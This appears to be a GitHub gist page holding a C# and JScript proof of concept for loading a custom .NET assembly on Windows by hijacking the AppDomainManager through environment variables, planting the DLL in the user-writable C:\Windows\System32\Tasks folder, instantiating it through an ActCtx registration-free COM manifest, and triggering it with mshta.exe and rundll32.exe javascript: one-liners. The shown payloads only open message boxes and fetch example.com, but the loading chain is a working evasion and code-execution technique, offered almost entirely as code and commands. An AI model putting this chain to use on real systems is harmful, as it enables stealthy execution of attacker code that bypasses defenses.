Skip to content

Instantly share code, notes, and snippets.

@byt3bl33d3r
Forked from xpn/tasks.cs
Created January 14, 2020 07:31
Show Gist options
  • Save byt3bl33d3r/bb0e2444ef1130e5d487799135a4a7da to your computer and use it in GitHub Desktop.
Save byt3bl33d3r/bb0e2444ef1130e5d487799135a4a7da to your computer and use it in GitHub Desktop.
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
using System.Net;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
System.Windows.Forms.MessageBox.Show("AppDomain - KaBoom!");
// You have more control here than I am demonstrating. For example, you can set ApplicationBase,
// Or you can Override the Assembly Resolver, etc...
return;
}
}
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:tasks.dll tasks.cs
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
set COMPLUS_Version=v4.0.30319
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
Simple One-Liner Triggers.
mshta.exe javascript:a=new%20ActiveXObject("System.Object");close();
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("System.Object");close();
*/
namespace MyDLL
{
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.Operations")]
public class Operations
{
public Operations()
{
Console.WriteLine("So It Begins");
}
[ComVisible(true)]
public string getValue1(string sParameter)
{
switch (sParameter)
{
case "a":
return "A was chosen";
case "b":
return "B was chosen";
case "c":
return "C was chosen";
default:
return "Other";
}
}
[ComVisible(true)]
public string getValue2()
{
return "From VBS String Function";
}
[ComVisible(true)]
public void getValue3()
{
System.Windows.Forms.MessageBox.Show("Hey From My Assembly");
}
}
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5DCAC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.MyClassBuilder")]
public class MyClassBuilder
{
public MyClassBuilder()
{
Console.WriteLine("So It Begins, My ClassBuilder");
}
public object Typer(string inputString)
{
//https://stackoverflow.com/questions/11107536/convert-string-to-type-in-c-sharp
Type type = Type.GetType(inputString); //target type
object o = Activator.CreateInstance(type); // an instance of target type
return o;
}
public void getTypes()
{
List<Type> list = new List<Type>();
foreach (Assembly ass in AppDomain.CurrentDomain.GetAssemblies())
{
foreach (Type t in ass.GetExportedTypes())
{
if (t.IsEnum)
{
list.Add(t);
}
}
}
foreach (Type i in list)
{
Console.WriteLine(i.ToString());
}
}
public System.Net.WebClient getWC() //Just an Example ;-)
{
WebClient wc = (System.Net.WebClient)Activator.CreateInstance(typeof(System.Net.WebClient));
return wc;
}
}
}
// var manifest string should be UTF-16
// Controls the search path for unmanged dlls
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
//new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Research\\Documents\\';
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'MyAppDomainManager';
var o = new ActiveXObject("System.Object"); // Trigger AppDomainManager Load
// Ideally, we create a DLL, drop it anywhere and load it like DynamicWrapper...
// Loads Assembly, but expects it in the C:\Windows\System32 for example for managed code...
// Good news, CLR tries to resolve in sub dir with name of app.
// Since C:\Windows\system32\tasks is user writable... :) CLR finds and loads our assembly.
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28}
ax.ManifestText = manifest;
var dwx = ax.CreateObject("MyDLL.Operations");
dwx.getValue3() //Trigger Message Box
var manifest2 = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.MyClassBuilder" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5DCAD}" progid="MyDLL.MyClassBuilder" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ax2 = new ActiveXObject("Microsoft.Windows.ActCtx"); //GUID {8fa7728f-b69b-4ee5-99f2-e2aa021bef28}
ax2.ManifestText = manifest2;
var dwx2 = ax2.CreateObject("MyDLL.MyClassBuilder");
//dwx2.getTypes();
var wc = dwx2.getWC();
var s = wc.DownloadString("http://www.example.com");
WScript.StdOut.WriteLine(s);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment